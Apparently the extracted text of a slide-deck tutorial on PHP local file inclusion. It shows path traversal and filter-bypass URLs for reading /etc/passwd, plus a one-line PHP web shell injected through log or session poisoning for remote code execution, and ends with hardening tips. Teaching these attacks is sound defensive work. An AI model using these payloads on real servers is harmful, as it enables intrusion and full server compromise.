File inclusion vulnerabilities allow attackers to include local and remote files on a server. If inclusion logic is not implemented properly, it can lead to source code disclosure, data exposure, and remote code execution. Common file inclusion attacks traverse directories, bypass extensions, inject payloads into log files or PHP sessions that are later executed on the server. Proper input validation and restricting included files can help mitigate these risks.
2. $ 7absec
File Inclusion is a common web application vulnerability, which can be easily
overlooked as part of the application functionality. Server-side languages such as
PHP or JSP can dynamically include external scripts, reducing the script's overall size
and simplifying the code.
3. $ 7absec
If the inclusion logic isn't implemented properly, attackers can include both local
and remote files, potentially leading to source code disclosure, sensitive data
exposure, and code execution under certain conditions.
6. $ 7absec
Is an attack done by attacker on WebApp by including the local files that are
present on the system.
7. $ 7absec
1:
Explanation --
Use Case
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• The simplest way of local file inclusion.
• No restrictions && No parameters.
• include($_GET[‘FileName’]);
8. $ 7absec
The World-File inclusion
• Linux
/etc/passwd
http://example.com/?file=/etc/passwd
• Windows
C:Windowsboot.ini
http://example.com/?file=C:Windowsboot.ini
1:
Explanation --
Use Case
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
9. $ 7absec
1: Basic LFI
2:
Explanation –
Use Case
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• Sometimes, developers specify absolute paths when
including files.
• include("./file/" . $_GET[‘FileName’]);
• Input from parameters can even be used as part of
filenames.
• include(“file_" . $_GET[‘FileName']);
10. $ 7absec
1: Basic LFI
2:
Explanation –
Use Case
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• This restriction can be bypassed by traversing
directories using a few ../ before the desired file
name.
• http://example.com/?file=../../../../../etc/passwd
• http://example.com/?file=/../../../../../etc/passwd
11. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3:
Explanation –
Use Case
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• Scripts can employ search and replace techniques to
avoid path traversals.
• $File = str_replace('../', ‘ ', $_GET[‘FileName']);
12. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3:
Explanation –
Use Case
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• This restriction can be bypassed by ….//….//….//
• http://example.com/?file=....//....//...//etc/passwd
• Bypass via URL encoding ../ == %2e%2e%2f
• http://example.com/?file= %2e%2e%2f etc/passwd
13. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4:
Explanation –
Use Case
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• Scripts can manually append a .php or any other
required extension before including the file
• include($_GET['language'] . ".php");
14. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4:
Explanation –
Use Case
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• PHP versions before 5.5 are vulnerable to null byte
injection.
• Adding a null byte (x00) at the end of the filename
should bypass the extension check.
• This can be also bypassed with PHP Wrappers.
• http://example.com/?file= /etc/passwdx00
15. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5:
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6: Hardening Techniques
• LFI can lead to Remote Code Execution (RCE) under
some conditions, resulting in a complete server
compromise.
• One common way is to poison log files, which are
modified based on requests to the webserver.
16. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5:
A:
Explanation –
Use Case
B: RCE through PHP Session Files
6: Hardening Techniques
• Apache and Nginx maintain various log files such as
access.log and error.log.
• The access.log file contains information about all
requests made to the server and their User-Agent
strings.
• http://example.com/?file= /var/log/apache2/access.log
17. $ 7absec
• The log contains the remote IP address, request page,
response code, and the user-agent string.
• <?php system($_GET['cmd']); ?>
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5:
A:
Explanation –
Use Case
B: RCE through PHP Session Files
6: Hardening Techniques
18. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5:
A: RCE through Apache / Nginx Log files
B:
Explanation –
Use Case
6: Hardening Techniques
• Similar to server log files, PHP saves user sessions on
disk.
• This path is dictated by the session.save_path
configuration variable, which is empty by default.
• http://example.com/?file= /var/lib/php/sessions/sess_$id
19. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5:
A: RCE through Apache / Nginx Log files
B:
Explanation –
Use Case
6: Hardening Techniques
• Injecting PHP web shell into the session log file
• http://example.com/?file= <?php system($_GET['cmd']); ?>
20. $ 7absec
1: Basic LFI
2: LFI with Path Traversal
3: LFI with Blacklisting
4: LFI with Appended Extension
5: LFI to Remote Code Execution
A: RCE through Apache / Nginx Log files
B: RCE through PHP Session Files
6:
1: Use built-in tool
basename()
open_basedir
display_errors
disable functions (system, shell_exec, curl_exec, etc.)
2: Doing the Correct Checks
use allow_list instead of deny_list